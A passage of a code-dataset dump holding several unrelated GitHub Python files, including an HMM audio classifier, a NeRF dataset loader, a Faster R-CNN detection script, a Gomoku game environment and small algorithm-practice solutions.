well as is_silent() function)\n data_all = normalize(data_all)\n return sample_width, data_all\n\n\ndef record_to_file(path):\n \"Records from the microphone and outputs the resulting data to 'path'\"\n sample_width, data = record()\n data = pack('<' + ('h' * len(data)), *data)\n\n wave_file = wave.open(path, 'wb')\n wave_file.setnchannels(CHANNELS)\n wave_file.setsampwidth(sample_width)\n wave_file.setframerate(RATE)\n wave_file.writeframes(data)\n wave_file.close()\n\n\nif __name__ == '__main__':\n # LOAD TRAIN DATA\n print(\"Loading training data\")\n categories = init_categories()\n training_data = list()\n load_all_training_data(training_data, categories)\n print(\"Done loading training data\")\n print(\"\\n\")\n\n # TRAIN MODELS\n print(\"Training the word HMMs\")\n hip_hop_hmms = train_hmms(training_data, categories)\n print(\"Done training the word HMMs\")\n print(\"\\n\")\n\n # LOAD TESTING DATA\n print('Loading Testing Data')\n testing_data = list()\n load_all_testing_data(testing_data, categories)\n print('Done Loading Testing Data')\n print(\"\\n\")\n\n # Create true category labels for testing data\n true_category_list = list()\n for word in testing_data:\n # normalize categories for words that had multiple training\n normalize_categories(word)\n true_category_list.append(word.get_category())\n\n # PREDICT TESTING DATA\n print(\"Predicting Testing Data\")\n prediction = predict(testing_data, hip_hop_hmms)\n print(\"Done Predicting Testing Data\")\n print(\"\\n\")\n\n # present data so easy to see which examples are being marked incorrectly\n misclassified = PrettyTable(['Example Number', 'Real Value', 'Predicted Value'])\n\n # add misclassified examples\n for i in range(len(testing_data)):\n if testing_data[i].get_category() != prediction[i]:\n misclassified.add_row([i+1, testing_data[i].get_category(), prediction[i]])\n\n print(\"Overall classification rate is {}\".format(get_classification_rate(prediction, true_category_list)))\n print(\"\\n\")\n print(\"The following table has the misclassified examples real and predicted values:\\n\")\n print(misclassified)\n","repo_name":"lucasklawrence/hiphop_artist_recognition","sub_path":"artist_recognition.py","file_name":"artist_recognition.py","file_ext":"py","file_size_in_byte":8787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1843350219","text":"import torch\nimport torch.utils.data as data\nimport os\nimport numpy as np\nimport json\nfrom PIL import Image\nfrom .utils import load_pc, get_rays, PointCloud, load_pc_np, setup_scene, get_proj_matrix\nfrom torchvision import transforms as T\nimport time\n\nfrom .rasterizer import MultiscaleRender\nfrom .shader import NNScene\nfrom glumpy import app, gloo, gl\n\nclass nerfDataset(data.Dataset):\n\n def __init__(self, args, split, mode):\n \n self.img_wh = (args.W, args.H)\n self.device = args.device\n self.pc_dir = args.pcdir\n self.mode = mode\n\n datadir = args.datadir\n self.blender2opencv = np.array([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n with open(os.path.join(datadir, 'transforms_' + split + '.json'), 'r') as f:\n self.meta = json.load(f)\n self.transform = T.ToTensor()\n focal = 0.5 * 800 / np.tan(0.5 * self.meta['camera_angle_x']) \n focal *= self.img_wh[0] / 800\n self.intrinsic = torch.tensor([[focal, 0, self.img_wh[0] / 2], [0, focal, self.img_wh[1] / 2], [0, 0, 1]], dtype=torch.float32)\n\n self.id_list = [i for i in range(len(self.meta[\"frames\"]))]\n self.img_list = []\n self.w2c_list 
= []\n self.ray_list = []\n self.c2w_list = []\n\n for idx in self.id_list:\n frame = self.meta['frames'][idx] \n image_path = os.path.join(datadir, f\"{frame['file_path']}.png\")\n # print(image_path)\n\n # load img\n img = Image.open(image_path)\n img = img.resize(self.img_wh, Image.LANCZOS)\n img = self.transform(img).permute(1,2,0)\n self.img_list.append(img[...,:3] * img[...,-1:] + (1 - img[...,-1:])) \n \n\n # load pose\n pose = np.array(frame['transform_matrix']) @ self.blender2opencv\n pose_gl = pose.copy()\n pose_gl[:,1:3] = (-1) * pose_gl[:,1:3] # for opengl\n self.c2w_list.append(pose_gl)\n c2w = torch.tensor(pose, dtype=torch.float32)\n\n # load ray\n if mode == 'render':\n ray = get_rays(args.H, args.W, self.intrinsic, c2w)\n self.ray_list.append(ray)\n else:\n self.ray_list.append(torch.ones([0]))\n\n pose = np.linalg.inv(pose)\n self.w2c_list.append(torch.tensor(pose, dtype=torch.float32))\n\n # opengl\n self.scene = NNScene()\n xyz, normal, color = load_pc_np(args.pcdir)\n setup_scene(self.scene, xyz, color, normal, c2w.numpy())\n app.Window(visible=False) # creates GL context\n self.renderer = MultiscaleRender(self.scene, [800, 800])\n self.proj_mat = get_proj_matrix(self.intrinsic.numpy(), [800, 800])\n\n def get_pc(self):\n pc_xyz = load_pc(self.pc_dir, self.device) # n,3\n pc = PointCloud(pc_xyz, self.intrinsic, self.device, self.img_wh)\n return pc\n\n def __len__(self):\n return len(self.id_list)\n\n def __getitem__(self, idx):\n \"\"\"\n Returns:\n data dict {\"img.rgb\": rgb (H W C),\n \"img.mask\": mask (H,W 1),\n \"camera_mat\": camera_mat (4,4)\n \"\"\"\n idx = idx % self.__len__()\n rgb = self.img_list[idx]\n w2c = self.w2c_list[idx]\n ray = self.ray_list[idx]\n c2w = self.c2w_list[idx]\n # ray = get_rays(800, 800, self.intrinsic, torch.tensor(c2w))\n t1 = time.time()\n depth = self.renderer.render(view_matrix=c2w, proj_matrix=self.proj_mat) # np 800 800 1\n t2 = time.time()\n depth[depth==0] = -1\n \n\n return {\"idx\": str(idx).rjust(3,'0'),\n \"rgb\": rgb.to(self.device), \n \"w2c\": w2c.to(self.device),\n \"ray\": ray.to(self.device),\n \"zbuf\": torch.tensor(depth, device=self.device),\n 't':t2-t1}\n","repo_name":"yizhangphd/FreqPCR","sub_path":"dataset_gl/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"885554359","text":"#!/usr/bin/env python3\nimport sys\n\nMOD = 123 # type: int\nYES = \"yes\" # type: str\nNO = \"NO\" # type: str\n\n\ndef solve(N: int, M: int, H: \"List[List[str]]\", A: \"List[int]\", B: \"List[float]\", Q: int, X: \"List[int]\"):\n print(N, M)\n assert len(H) == N - 1\n for i in range(N - 1):\n assert len(H[i]) == M - 2\n print(*H[i])\n assert len(A) == N - 1\n assert len(B) == N - 1\n for i in range(N - 1):\n print(A[i], B[i])\n print(Q)\n assert len(X) == M + Q\n for i in range(M + Q):\n print(X[i])\n\n print(YES)\n print(NO)\n print(MOD)\n\n\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n H = [[next(tokens) for _ in range(M - 1 - 2 + 1)] for _ in range(N - 2 + 1)] # type: \"List[List[str]]\"\n A = [int()] * (N - 2 + 1) # type: \"List[int]\"\n B = [float()] * (N - 2 + 1) # type: \"List[float]\"\n for i in range(N - 2 + 1):\n A[i] = int(next(tokens))\n B[i] = float(next(tokens))\n Q = int(next(tokens)) # type: int\n X = [int(next(tokens)) for 
_ in range(M + Q)] # type: \"List[int]\"\n solve(N, M, H, A, B, Q, X)\n\nif __name__ == '__main__':\n main()\n","repo_name":"kyuridenamida/atcoder-tools","sub_path":"tests/resources/test_codegen/test_default_code_generators_and_templates/python/expected_echo_generated_code.py","file_name":"expected_echo_generated_code.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"37"} +{"seq_id":"6264618235","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('partner', '0002_auto_20141007_2032'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='partner',\n name='users',\n field=models.ManyToManyField(related_name='partners', verbose_name='Users', to=settings.AUTH_USER_MODEL, blank=True),\n ),\n ]\n","repo_name":"django-oscar/django-oscar","sub_path":"tests/_site/apps/partner/migrations/0003_auto_20150604_1450.py","file_name":"0003_auto_20150604_1450.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"} +{"seq_id":"45842302938","text":"#!/usr/bin/env python\n### https://blog.csdn.net/weixin_42111393/article/details/82940681\n## 将tf-faster-r cnn中的框画在一张图内\n# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Xinlei Chen, based on code from Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"\nDemo script showing detections in sample images.\n\nSee README.md for installation instructions before running.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport os.path as osp\nimport os\n\nfrom Crop_Detection.lib.config import config as cfg\nfrom Crop_Detection.lib.utils.nms_wrapper import nms\nfrom Crop_Detection.lib.utils.test import im_detect\n#from nets.resnet_v1 import resnetv1\nfrom Crop_Detection.lib.nets.vgg16 import vgg16\nfrom Crop_Detection.lib.utils.timer import Timer\n\nimport Picture_Slicing_Processing as PSP\nimport draw_toolbox as draw_toolbox\nimport dataset_common as dataset_common\n\n# CLASSES = ('__background__',\n# 'aeroplane', 'bicycle', 'bird', 'boat',\n# 'bottle', 'bus', 'car', 'cat', 'chair',\n# 'cow', 'diningtable', 'dog', 'horse',\n# 'motorbike', 'person', 'pottedplant',\n# 'sheep', 'sofa', 'train', 'tvmonitor')\nCLASSES = ('__background__','bleeding_black','bleeding_leaf','bleeding_leaf_big','bleeding_flower')\n\nNETS = {'vgg16': ('vgg16_faster_rcnn_iter_68500.ckpt',), 'res101': ('res101_faster_rcnn_iter_110000.ckpt',)}\nDATASETS = {'pascal_voc': ('default',), 'pascal_voc_0712': ('voc_2007_trainval+voc_2012_trainval',)}\n\n\ndef get_bbox( class_name, im, dets, thresh=0.5):\n # cls_bbox_score = {}\n all_bbox = []\n inds = np.where(dets[:, -1] >= thresh)[0]\n if len(inds) == 0:\n return all_bbox\n else:\n print('Box numbers: ', class_name, ' ', len(inds))\n h, w, _ = im.shape\n for i in inds:\n bbox = dets[i, :4]\n score = dets[i, -1]\n # temp_bbox_yx = []\n # temp_bbox_yx.append(bbox[1]/h) # y1\n # temp_bbox_yx.append(bbox[0] / w) # x1\n # 
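            # (note on this commented-out block: it normalised [x1, y1, x2, y2] pixel\n            # coordinates to fractional (y, x) order by dividing by image height h and\n            # width w; each row of dets holds [x1, y1, x2, y2, score], which is why the\n            # score above is read from dets[i, -1].)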
temp_bbox_yx.append(bbox[3] / h) # y2\n # temp_bbox_yx.append(bbox[2] / w) # x2\n # temp_bbox_yx.append(score) # 得分\n # all_bbox.append(temp_bbox_yx)\n all_bbox.append(dets[i])\n # if len(all_bbox) != 0:\n # cls_bbox_score[class_name] = all_bbox\n return all_bbox\n\n\ndef vis_detections(ax, im, class_name, dets, thresh=0.5):\n \"\"\"Draw detected bounding boxes.\"\"\"\n inds = np.where(dets[:, -1] >= thresh)[0]\n if len(inds) == 0:\n return\n\n print('Box numbers: ', class_name, ' ',len(inds))\n for i in inds:\n bbox = dets[i, :4]\n score = dets[i, -1]\n #print(bbox[0], bbox[1], bbox[2], bbox[3])\n ## 红框\n ax.add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n bbox[2] - bbox[0],\n bbox[3] - bbox[1], fill=False,\n edgecolor='red', linewidth=1)## linewidth=3.5\n )\n ## 白字蓝底标签\n ax.text(bbox[0], bbox[1] - 2,\n '{:s} {:.3f}'.format(class_name, score),\n bbox=dict(facecolor='blue', alpha=0),\n fontsize=3, color='white')## fontsize=14; alpha=0.5\n\n ## 标题\n # ax.set_title(('{} detections with '\n # 'p({} | box) >= {:.1f}').format(class_name, class_name,\n # thresh),\n # fontsize=14)\n\n #plt.tight_layout() ### tight_layout会自动调整子图参数,使之填充整个图像区域\n\n\ndef demo(sess, net, image_name):\n \"\"\"Detect object classes in an image using pre-computed object proposals.\"\"\"\n\n # Load the demo image\n #im_file = os.path.join(cfg.FLAGS2[\"data_dir\"], 'demo', image_name)\n im_file = os.path.join(file_path, image_name)\n im = cv2.imread(im_file)\n\n # Detect all object classes and regress object bounds\n timer = Timer()\n timer.tic()\n scores, boxes = im_detect(sess, net, im)\n timer.toc()\n #print('Detection took {:.3f}s for {:d} object proposals'.format(timer.total_time, boxes.shape[0]))\n # {:d}个对象检测耗时{:.3f}秒\n\n # Visualize detections for each class\n # 可视化每个类的检测\n CONF_THRESH = 0.85 # 置信度,可视化置信度大于0.6的框\n NMS_THRESH = 0.1 # 示非极大值抑制,这个值越小表示要求的红框重叠度越小,0.0表示不允许重叠\n im = im[:, :, (2, 1, 0)] # 1,2,0��色;0,1,2蓝色\n fig, ax = plt.subplots(figsize=(12, 12)) # figsize代表像素值\n ax.imshow(im, aspect='equal')\n\n label_total = []\n score_totatl = []\n bbox_total = []\n for cls_ind, cls in enumerate(CLASSES[1:]):\n cls_ind += 1 # because we skipped background\n cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]\n cls_scores = scores[:, cls_ind]\n dets = np.hstack((cls_boxes,\n cls_scores[:, np.newaxis])).astype(np.float32)\n keep = nms(dets, NMS_THRESH)\n dets = dets[keep, :]\n bbox_score = get_bbox(cls_ind, dets, thresh=CONF_THRESH) # 每一类的bbox\n if len(bbox_score) != 0:\n cls_id_num = len(bbox_score)\n for i in range(cls_id_num):\n label_total.append(cls_ind)\n score_totatl.append(bbox_score[i][-1])\n bbox_total.append(bbox_score[i][:-4])\n\n vis_detections(ax, im, cls, dets, thresh=CONF_THRESH)\n plt.axis('off') ## #不显示坐标尺寸\n plt.draw()\n\n ##去白边\n height, width, channels = im.shape\n # 如果dpi=300,那么图像大小=height*width\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n # dpi是设置清晰度的,大于300就很清晰了,但是保存下来的图片很大\n # print('dddd')\n return label_total, score_totatl, bbox_score\n\n\ndef mulite_demo(sess, net, im, NMS_thred=None):\n \"\"\"Detect object classes in an image using pre-computed object proposals.\"\"\"\n\n # Load the demo image\n # Detect all object classes and regress object bounds\n timer = Timer()\n timer.tic()\n scores, boxes = im_detect(sess, net, im)\n timer.toc()\n #print('Detection took {:.3f}s 
for {:d} object proposals'.format(timer.total_time, boxes.shape[0]))\n # {:d}个对象检测耗时{:.3f}秒\n\n # Visualize detections for each class\n # 可视化每个类的检测\n CONF_THRESH = NMS_thred # 置信度,可视化置信度大于0.6的框\n NMS_THRESH = 0.3 # 示非极大值抑制,这个值越小表示要求的红框重叠度越小,0.0表示不允许重叠\n label_total = []\n score_total = []\n bbox_total = []\n for cls_ind, cls in enumerate(CLASSES[1:]):\n cls_ind += 1 # because we skipped background\n cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]\n cls_scores = scores[:, cls_ind]\n dets = np.hstack((cls_boxes,\n cls_scores[:, np.newaxis])).astype(np.float32)\n keep = nms(dets, NMS_THRESH)\n dets = dets[keep, :]\n bbox_score = get_bbox(cls_ind, im, dets, thresh=CONF_THRESH) # 每一类的bbox\n if len(bbox_score) != 0:\n cls_id_num = len(bbox_score)\n for i in range(cls_id_num):\n label_total.append(cls_ind)\n score_total.append(bbox_score[i][-1])\n bbox_total.append(bbox_score[i][:4])\n\n # print(len(label_total), len(score_total), len(bbox_total))\n label_total = np.array(label_total)\n score_total = np.array(score_total)\n bbox_total = np.array(bbox_total)\n return label_total, score_total, bbox_total\n\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='Tensorflow Faster R-CNN demo')\n parser.add_argument('--net', dest='demo_net', help='Network to use [vgg16 res101]',\n choices=NETS.keys(), default='vgg16')\n parser.add_argument('--dataset', dest='dataset', help='Trained dataset [pascal_voc pascal_voc_0712]',\n choices=DATASETS.keys(), default='pascal_voc')\n args = parser.parse_args()\n\n return args\n\n\ndef call_Detection(input, thred=0.5):\n print(thred)\n if thred is None:\n thred = 0.5\n image_path = input\n NMS_thred = thred\n\n basename = 'Detection_result_Thred_' + str(thred) + '_' + osp.basename(image_path)\n dirname = osp.dirname(image_path)\n\n if not osp.exists(dirname):\n os.mkdir(dirname)\n\n savedir = osp.join(dirname, 'out_result/')\n if not osp.exists(savedir):\n os.mkdir(savedir)\n\n savename = osp.join(savedir, basename)\n\n args = parse_args()\n # model path\n demonet = args.demo_net\n dataset = args.dataset\n\n tfmodel = os.path.join('./Crop_Detection/trained_models', 'default_0.0001_DataAug2', NETS[demonet][0])\n\n if not os.path.isfile(tfmodel + '.meta'):\n print('tfmodel: ', tfmodel)\n raise IOError(('{:s} not found.\\nDid you download the proper networks from '\n 'our server and place them properly?').format(tfmodel + '.meta'))\n\n # set config\n tfconfig = tf.ConfigProto(allow_soft_placement=True)\n tfconfig.gpu_options.allow_growth = True\n tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.6\n\n # init session\n sess = tf.Session(config=tfconfig)\n # load network\n if demonet == 'vgg16':\n net = vgg16(batch_size=1)\n\n else:\n raise NotImplementedError\n\n n_classes = len(CLASSES)\n # create the structure of the net having a certain shape (which depends on the number of classes)\n net.create_architecture(sess, \"TEST\", n_classes,\n tag='default', anchor_scales=[8, 16, 32])\n saver = tf.train.Saver()\n saver.restore(sess, tfmodel)\n\n print('Loaded network {:s}'.format(tfmodel))\n paths = []\n paths.append(image_path)\n for im_name in paths: # 大图\n print('---------------------------------------------------------')\n print('Demo for data/demo/{}'.format(im_name))\n labels_total = []\n scores_total = []\n bboxes_total = []\n\n import time\n start_time = time.time()\n sub_img, site = PSP.splitimage(image_path, shape=[416, 416], strided=300)\n\n for image in sub_img: # 子图\n\n labels_, scores_, bboxes_ = 
mulite_demo(sess, net, image, NMS_thred=NMS_thred) # 单张子图结果\n num_bbox = len(labels_)\n labels_total.append(labels_)\n scores_total.append(scores_)\n bboxes_total.append(bboxes_)\n\n print('num of bbo:', len(bboxes_total))\n\n labels_merge, scores_merge, bboxes_merge = PSP.merge_label(labels_total, scores_total, bboxes_total, site,\n [500, 500], im.shape)\n\n result_img, shapes = draw_toolbox.bboxes_draw_on_img(im, labels_merge, scores_merge, bboxes_merge)\n\n label_id_dict = draw_toolbox.gain_translate_table()\n # labels_merge = labels_merge.tolist()\n result_num = {}\n for i in range(len(labels_merge)):\n temp = labels_merge[i]\n if temp not in result_num.keys():\n result_num[temp] = 1\n else:\n result_num[temp] = result_num[temp] + 1\n class_num = ''\n for key, value in result_num.items():\n if key in label_id_dict.keys():\n class_num = class_num + label_id_dict[key] + \"_\" + str(value)\n end_time = time.time()\n\n time_image = end_time - start_time\n jsonname = 'Thred_' + str(thred) +osp.basename(image_path).split('.')[0] + '.json'\n filename = osp.join(savedir, jsonname)\n\n from save_json import Save_Json\n json_result = Save_Json()\n json_result.save(filename, shapes, im, NMS_thred)\n cv2.imwrite(savename, result_img)\n\n print('--------------- finish -----------------------')\n\n\n# if __name__ == '__main__':\n# img = '/home/kfgeo/Models/Crop_Detection/orig_img/test.png'\n# call_Detection(img,thred=0.8)\n# # args = parse_args()\n# # out_path = '/home/kfgeo/Models/Crop_Detection/123/'\n# # # model path\n# # demonet = args.demo_net\n# # dataset = args.dataset\n# # # tfmodel = os.path.join('output', demonet, DATASETS[dataset][0], 'default', NETS[demonet][0])\n# # tfmodel = os.path.join('trained_models','default_0.0001_DataAug2', NETS[demonet][0])\n# #\n# # if not os.path.isfile(tfmodel + '.meta'):\n# # print('tfmodel: ',tfmodel)\n# # raise IOError(('{:s} not found.\\nDid you download the proper networks from '\n# # 'our server and place them properly?').format(tfmodel + '.meta'))\n# #\n# # # set config\n# # tfconfig = tf.ConfigProto(allow_soft_placement=True)\n# # tfconfig.gpu_options.allow_growth = True\n# #\n# # # init session\n# # sess = tf.Session(config=tfconfig)\n# # # load network\n# # if demonet == 'vgg16':\n# # net = vgg16(batch_size=1)\n# # # elif demonet == 'res101':\n# # # net = resnetv1(batch_size=1, num_layers=101)\n# # else:\n# # raise NotImplementedError\n# #\n# # n_classes = len(CLASSES)\n# # # create the structure of the net having a certain shape (which depends on the number of classes)\n# # net.create_architecture(sess, \"TEST\", n_classes,\n# # tag='default', anchor_scales=[8, 16, 32])\n# # saver = tf.train.Saver()\n# # saver.restore(sess, tfmodel)\n# #\n# # print('Loaded network {:s}'.format(tfmodel))\n# #\n# # # im_names = ['000456.jpg', '000457.jpg', '000542.jpg', '001150.jpg',\n# # # '001763.jpg', '004545.jpg']\n# # # file_path = '/kuafugeo/zmy/Faster-RCNN-TensorFlow-Python3/data/test'\n# # file_path ='/home/kfgeo/Models/Crop_Detection/orig_img/'\n# # im_names = os.listdir(file_path)\n# #\n# # for im_name in im_names: # 大图\n# # print('---------------------------------------------------------')\n# # print('Demo for data/demo/{}'.format(im_name))\n# # # print('\\n')\n# # labels_total = []\n# # scores_total = []\n# # bboxes_total = []\n# # im_file = os.path.join(file_path, im_name)\n# # # im_name = 'DJI_0017.JPG'\n# # # im_file = '/kuafugeo/zmy/Faster-RCNN-TensorFlow-Python3/data/demo_big/DJI_0017.JPG'\n# # import time\n# # start_time = time.time()\n# # im = 
#plt.show()","repo_name":"ResidualNS/tobacco_planting_project","sub_path":"second-stage/pytorch-yolov3-master/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":19084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9716619918","text":"import numpy as np\n\nif __name__ == \"__main__\":\n\timport tensorflow as tf\n\tfrom .ROIPoolingWrapper import *\n\n\twith tf.Session() as sess:\n\t\timg = np.zeros((1,8,8, 9), np.float32)\n\t\tboxes = tf.constant([[0,0,2*16,5*16]], dtype=tf.float32)\n\t\tprint(boxes.get_shape().as_list())\n\n\t\tyOffset=0\n\t\txOffset=0\n\t\tchOffset=0\n\t\timg[0,yOffset+0:yOffset+1,xOffset+0:xOffset+1,chOffset+0:chOffset+1]=1;\n\t\t#img[:,:,:,:]=1\n\t\tp = tf.placeholder(tf.float32, shape=img.shape)\n\n\t\tnp.set_printoptions(threshold=5000, linewidth=150)\n\n\t\tpooled=positionSensitiveRoiPooling(p, boxes)\n\t\tpooled=tf.Print(pooled,[tf.shape(pooled)],\"pooled shape\", summarize=100)\n\t\tprint(sess.run(pooled, feed_dict={p: img}))\n\n\n\t\tloss = tf.reduce_sum(pooled)\n\n\t\tg = tf.gradients(loss, p)\n\n\t\tprint(img)\n\t\tprint(sess.run(g, feed_dict={p: img})[0])\n\t\tprint(sess.run(g, feed_dict={p: img})[0][:,:,:,1])\n\n\n","repo_name":"wucng/TensorExpand","sub_path":"TensorExpand/Object detection/RFCN/RFCN-tensorflow/BoxEngine/ROIPooling/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"37"} +{"seq_id":"5283994877","text":"from django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom . import views\n\napp_name = 'drivers_app'\n\nurlpatterns = [\n # path('', views.index, name='index'),\n # path('drivers/', views.drivers_list),\n # path('drivers//', views.drivers_detail),\n # path('schedule/', views.schedule_list),\n # path('schedule//', views.schedule_detail),\n path('drivers/', views.DriversList.as_view()),\n path('drivers//', views.DriversDetail.as_view()),\n path('schedule/', views.ScheduleList.as_view()),\n path('schedule//', views.ScheduleDetail.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"hagarz/JV-Nehagim","sub_path":"ey_drivers/drivers_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21230454667","text":"'''This script uses pytesseract to read the data from the whatsapp call log screenshots'''\nimport image_processing\nimport glob\nfrom tqdm import tqdm\n\n\ncall_directory = r'C:\\Users\\Owner\\Documents\\Programming\\Python\\Projects\\Kayes Gift\\Whatsapp_Analyzer\\Call_Screenshots'\ncall_screenshot_list = glob.glob(call_directory + \"/*.png\")\ncall_log = {}\nfor call in tqdm(call_screenshot_list):\n file_name,call_data = image_processing.process_image(call)\n call_log[file_name] = call_data\ncall_log_txt = call_directory + r\"\\call_logv2.txt\"\noutfile = open(call_log_txt, \"w\")\nprint(call_log, file=outfile)\noutfile.close()","repo_name":"Markpajr/Whatsapp_Analyzer","sub_path":"OCR_Call_Screenshot.py","file_name":"OCR_Call_Screenshot.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4337448346","text":"# -*- coding: utf-8 -*-\n# @Author: aaronlai\n# @Date: 2016-10-07 15:03:47\n# @Last Modified by: AaronLai\n# @Last Modified time: 
def winGame(sub_state):\n    \"\"\"check if the game winning criteria is met\"\"\"\n    rows, cols = sub_state.shape\n    for i in range(rows):\n        for j in range(cols):\n\n            # horizontal run of five (needs room to the right only)\n            if j + 5 <= cols and (sub_state[i][j: j+5] == 1).all():\n                return True\n\n            # vertical run of five (needs room below only)\n            if i + 5 <= rows and (np.array([sub_state[i+k, j] for k in range(5)]) == 1).all():\n                return True\n\n            # down-right diagonal run of five\n            if i + 5 <= rows and j + 5 <= cols and \\\n                    (np.array([sub_state[(i+k, j+k)] for k in range(5)]) == 1).all():\n                return True\n\n            # down-left diagonal run of five (missing from the original scan,\n            # which also truncated the horizontal/vertical scans at shape - 4)\n            if i + 5 <= rows and j >= 4 and \\\n                    (np.array([sub_state[(i+k, j-k)] for k in range(5)]) == 1).all():\n                return True\n\n    return False\n\n\ndef fullGrid(state):\n    \"\"\"check if the chessboard is full\"\"\"\n    return not ((state[:, :, 0] + state[:, :, 1]) == 0).any()\n\n\ndef getReward(state, whose_turn, win_reward=500, lose_reward=-1000,\n              even_reward=-100, keepgoing_reward=-10):\n    \"\"\"calculate the reward given to whom just moved\"\"\"\n    reward = [0, 0]\n\n    if winGame(state[:, :, whose_turn]):\n        reward[whose_turn] = win_reward\n        reward[1 - whose_turn] = lose_reward\n\n    elif fullGrid(state):\n        reward = [even_reward, even_reward]\n\n    else:\n        reward[whose_turn] = keepgoing_reward\n\n    return reward\n\n\ndef drawGrid(state):\n    \"\"\"visualize the chessboard\"\"\"\n    grid = np.zeros(state.shape[:2], dtype='<U1')\n\n    for i in range(state.shape[0]):\n        for j in range(state.shape[1]):\n            if (state[(i, j)] > 0).any():\n\n                if (state[(i, j)] == 1).all():\n                    raise\n\n                elif state[(i, j)][0] == 1:\n                    grid[(i, j)] = 'O'\n\n                else:\n                    grid[(i, j)] = 'X'\n\n    return grid\n\n\ndef displayGrid(grid):\n    \"\"\"print out the chessboard\"\"\"\n    wid = grid.shape[0]\n    show_num = 9 if wid > 9 else wid\n\n    # chessboard\n    line = '\\n' + '- + ' * (wid - 1) + '- {}\\n'\n    line = line.join([' | '.join(grid[i]) for i in range(wid)])\n\n    # mark the number of its lines\n    bottom = ('\\n' + ' {} ' * show_num)\n    bottom = bottom.format(*[i+1 for i in range(show_num)])\n\n    if show_num == 9:\n        part = (' {} '*(wid - show_num))\n        part = part.format(*[i+1 for i in range(show_num, wid)])\n        bottom += part\n\n    print(line.format(*[i+1 for i in range(wid)]) + bottom)\n\n\ndef try_display(width=19):\n    state, avai = initGame(width)\n    terminate = False\n\n    print('Start')\n    for i in range(int(width**2 / 2)):\n\n        for actor in [0, 1]:\n            new_state = None\n\n            while new_state is None:\n                x = np.random.randint(width)\n                y = np.random.randint(width)\n                move = (x, y)\n                new_state, avai = makeMove(state, avai, move, actor)\n\n            state = new_state\n            reward = getReward(state, actor)\n\n            if 500 in reward:\n                print('\\tterminal: %d\\n' % i)\n                terminate = True\n                break\n\n            elif -100 in reward:\n                print('\\tchessboard is full.\\n')\n                terminate = True\n                break\n\n        if terminate:\n            break\n\n    displayGrid(drawGrid(state))\n\n\ndef main():\n    try_display(11)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"AaronYALai/Reinforcement_Learning_Project","sub_path":"gomoku_game.py","file_name":"gomoku_game.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"31976991309","text":"\n#infile = \"rosalind_sample.txt\"\n
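# The total below is the inversion count of the array: each prefix's last\n# element adds one swap for every earlier element that exceeds it, which is\n# exactly the number of swaps insertion sort performs (the INS problem).\n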
\"rosalind_ins.txt\"\n\nwith open(infile) as f:\n array = f.readlines()[1].split()\n total_swap = 0\n for i in range(2, len(array) + 1):\n last_item = int(array[0:i][-1])\n total_swap += sum(int(elem) > last_item for elem in array[0:i])\n\n print(total_swap)\n","repo_name":"dpflieger/Rosalind","sub_path":"Algorithmics_heights/04_INS/INS.py","file_name":"INS.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8401860902","text":"def main():\n\n numCases = int(input())\n for num in range(numCases):\n # This is a meaning less line but for Kattis input....\n numShops = input()\n\n shopLocations = [int(x) for x in input().split(' ')]\n\n # Sort from the closest to the furthest\n sortedLocations = sorted(shopLocations)\n\n # Add up distances between all shops\n walkDistance = 0\n for i in range(len(sortedLocations)-1):\n walkDistance += sortedLocations[i+1]-sortedLocations[i]\n\n # Add furthes shor to car distance\n walkDistance += sortedLocations[-1] - sortedLocations[0]\n\n 